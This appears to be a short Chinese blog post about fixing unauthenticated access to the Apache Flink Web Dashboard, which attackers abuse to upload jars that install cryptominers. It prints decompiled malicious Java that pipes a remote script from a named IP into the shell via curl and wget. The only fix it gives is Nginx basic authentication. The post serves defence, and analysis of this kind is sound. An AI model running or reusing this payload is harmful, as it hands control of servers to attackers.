【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞

【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞

介绍

攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗

通过反编译得到的恶意代码:

package com.example;

import java.io.IOException;

public class Main {
    public Main() {
    }

    public static void main(String[] var0) throws IOException {
        String var1 = "142.44.191.122/f.sh";
        String var2 = "curl " + var1 + "|sh";
        String[] var3 = new String[]{"/bin/bash", "-c", var2};
        Runtime.getRuntime().exec(var3);
        String var4 = "wget -q -O - " + var1 + "|sh";
        String[] var5 = new String[]{"/bin/bash", "-c", var4};
        Runtime.getRuntime().exec(var5);
    }
}

思路:Nignx使用HTTP基本身份验证限制访问

介绍

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值